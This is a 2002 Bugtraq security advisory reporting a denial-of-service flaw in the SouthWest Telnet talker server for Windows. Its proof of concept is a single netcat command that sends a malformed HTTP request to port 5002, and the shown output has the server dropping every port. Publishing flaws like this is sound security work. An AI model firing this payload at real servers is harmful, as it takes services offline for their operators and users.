SouthWest Telnet talker server. DoS (Denial of Service Attack).

From: Alex Hernandez (alex_hernandez@ureach.com)
Date: 03/26/02 

Date: Mon, 25 Mar 2002 20:59:20 -0500
To: bugtraq@securityfocus.com
From: Alex Hernandez <alex_hernandez@ureach.com>

------oOo------
SouthWest free Telnet talker server. DoS (Denial of Service
Attack).
------oOo------

Company Affected: Scott Lloyd
Version: v1.0.0
Size: 2.74 MB
OS Affected: : Windows ALL.

Author:

** Alex Hernandez <alex_hernandez@ureach.com>
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.

----=[Brief Description]=------------
 
SouthWest is a free Telnet talker server for Windows. It
includes full ANSI color support,
a help system, an intuitive interface, and speed optimizations.
Free, full source code is
available at the company's Web site.

----=[Summary]=----------------------

The server is very similar to the IRC, this server by default
opens the following ports:

*Main socket initialized and listen on port 5000.
*Netlink socket initialized and listen on port 5001.
*HTTP server initialized and listen port 5002.

The bug is on port 5002, when requesting answer on remote user
via HTTP for any user
connected and crash the system.

------oOo------
Proof of concept

Example:

DoS

$ printf "GET /&Alex" |nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?) open
sent 10, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5000
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5001
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK

Crash system and the admin need restart the service!.

U can see this on Screen

[...]
Room: Hallway

You are in the hallway. The large front door leads out to the
drive whilst
another smaller door leads into the wizards room. A corridor
leads deeper
into the mansion.

Exits are: Drive Wizroom Corridor
Netlinks are: Cyber City

You are all alone here

Access is fixed to PUBLIC and there are 0 messages on the board.
Current topic: Topic has not been set
You say: Hello!
You say: Friends
You say: crash the system .....

Connection to host lost.

[...]

C:\>

------oOo------------------------------------
Vendor Response:
The vendor was notified
southwest@talker.com
http://someplaceelse.dynip.com/southwest/
Patch Temporary: No data of vendor.

Alex Hernandez <alex_hernandez@ureach.com> (c) 2002.

------oOo------------------------------------

________________________________________________
Get your own "800" number
Voicemail, fax, email, and a lot more
http://www.ureach.com/reg/tag